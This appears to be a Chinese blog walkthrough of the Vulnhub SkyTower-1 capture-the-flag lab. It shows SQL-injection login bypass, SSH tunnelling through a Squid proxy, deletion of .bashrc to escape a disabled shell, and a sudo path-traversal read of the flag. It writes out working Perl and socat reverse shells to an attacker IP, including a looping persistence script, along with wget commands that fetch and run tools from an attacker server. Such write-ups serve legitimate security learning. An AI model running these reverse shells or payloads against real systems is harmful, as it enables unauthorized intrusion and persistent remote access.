Vulnhub百個項目滲透

Vulnhub百個項目滲透——項目十一：skytower-1（代理登錄ssh，繞過shell禁用）

==================靶場地址=====================

---

🔥系列專欄：Vulnhub百個項目滲透
🎉歡迎關注🔎點贊👍收藏??留言📝
📆首發時間：🌴2022年9月11日🌴
🍭作者水平很有限，如果發現錯誤，還望告知，感謝！

巔峰之路

• Vulnhub百個項目滲透
• 前言
• 一、梳理流程
• 二、使用步驟
• • 1.端口發現
  • 2.web突破
  • • 1.漏掃
    • 2.sql爆破注入
    • 3.ssh突破
    • • proxytunnel利用
    • 4.建立穩定shell
    • • 1.建立持久shell
      • 2.建立穩定shell
  • 3.內網提權
  • • 1.枚舉端口及服務（使用腳本直接跑）
    • 2.信息再收集
    • 3.拿到flag
• 三、總結

---

前言

本文章僅用作實驗學習，實驗環境均為自行搭建的公開vuinhub靶場，僅使用kali虛擬機作為操作學習工具。本文僅用作學習記錄，不做任何導向。請勿在現實環境中模仿，操作。

---

一、梳理流程

端口發現（看看使用了哪些端口，開啟了什么服務，尋找突破點）

信息收集（利用遍歷，關鍵詞搜索等方式對敏感文件，插件嘗試訪問，尋求突破并獲取shell）

二次收集（基于已得到的服務或者主機再次信息收集）

內網提權（嘗試利用內核，各種版本漏洞等方式來提升權限）

毀尸滅跡（清除日志等文件，但是靶場就沒必要了，拿旗就走）

二、使用步驟

1.端口發現

ifconfig --查看你本機ip nmap -sP 192.168.247.0/24 ---掃存活主機 namp -sS -sV -A -T5 192.168.247.140 -----全端口掃描目標 nikto 192.168.247.140 --簡單掃描

這里知道開啟了ssh，http，還有一個3128的端口，并且是kernel 3的linux內核
Squid cache（簡稱為Squid）是流行最廣的，使用最普遍的開源緩存代理服務器
并且看到22端口后面沒東西，應該是被過濾了，所以這個3128端口應該是一個代理了靶場的22端口，我們就要用proxychains或者proxytunnle來做代理訪問
> https://blog.csdn.net/qq_21419995/article/details/80888680 講了squid的原理
我們先web訪問

2.web突破

1.漏掃

2.sql爆破注入

首先使用nikto來簡單掃描一下，發現只有一個登錄頁面

這是一個登錄框有登陸框的頁面就可以考慮sql注入，這里先使用bp抓包分析

抓包之后右鍵seng to intruder進行爆破

設置好兩處爆破變量

加一個單引號可以看到回顯說不符合mysql語法，這里我們知道了數據庫是mysql，考慮mysql提權并且這里可以sql注入，但是不能用sqlmap跑，是因為底層限制了很多函數，所以我們手工加入密碼本

https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list

篩選一下，選擇相應字段多的，就是登陸成功的

Username: john
Password: hereisjohn

3.ssh突破

得知需要用ssh登錄

ssh john@192.168.247.140

但是登陸不上，是因為被做了代理，這里借助proxytunnel工具

proxytunnel利用

proxytunnel隧道代理

proxytunnel是一款利用http connection封裝技術建立隧道的工具
使用條件：防火墻禁止DNS和ICMP隧道，只允許代理服務器上網的情景
-a 指定本地偵聽端口
-p 使用代理
-r 使用第二個代理
-d 指定訪問的目標和端口

proxytunnel -p 10.211.55.38:3128 -d 127.0.0.1:22 -a 5566 kali本地5566端口

將kali與項目的3128端口建立隧道，隧道建立的端口轉發到項目本地的22端口，然后在映射到kali本地1234端口。

bashrc文件是每一個linux都會有的，用來操作shell

case這一行是開啟shell
下一行是關閉，這里可以看到直接關閉，所以我們直接把這個文件刪掉

proxytunnel -p 10.211.55.38:3128 -d 127.0.0.1:22 -a 5566 rm .bashrc ---刪除bashrc文件

ssh john@127.0.0.1 -p 1234 ---成功登錄

4.建立穩定shell

1.建立持久shell

vim 1.sh -----進入后復制粘貼 ---------------------------- while true; doperl -e 'use Socket;$i="10.211.55.19";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'# sleep for 300 seconds (5 mins)sleep 300 done ---------------------------- 因為shell是通過22端口代理進去的實戰中防止萬一情況發生，由于對方安裝了perl ，所以用該進行反彈！每五分鐘會回彈一次！wget http://10.211.55.19:8081/1.sh chmod +x 1.sh ./1.sh

2.建立穩定shell

因為沒有安裝python，所以用這個生成原生終端，但是還是沒有tab鍵 perl -e 'use Socket;$i="10.211.55.19";$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'wget --no-check-certificate https://github.com/ernw/static-toolbox/releases/download/socat-v1.7.4.1/socat-1.7.4.1-x86_64 -O socatwget http://10.211.55.19:8081/socat chmod +x socatnc -vlp 9999 HOME=/dev/shm ./socat tcp:10.211.55.19:9998 exec:'/bin/bash -li',pty,stderr,sigint,sighup,sigquit,sane 這樣就可以在本地再反彈回來一個非常穩定的原生shell了

3.內網提權

1.枚舉端口及服務（使用腳本直接跑）

開啟http服務器功能，將腳本傳給靶機
靶機運行腳本
但這個靶場沒必要，因為很簡單

2.信息再收集

翻找目錄

找到數據庫賬號密碼

mysql -uroot -proot 登錄數據庫

sudo -l

一樣的方法去登錄，然后這個sara賬戶提示可以使用sudo 訪問相對路勁

sudo cat /accounts/../root/flag.txt

3.拿到flag

三、總結

1.代理登錄ssh
2.繞過shell禁用

總結

以上是生活随笔為你收集整理的【甄选靶场】Vulnhub百个项目渗透——项目十一：skytower-1（代理登录ssh，绕过shell禁用）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。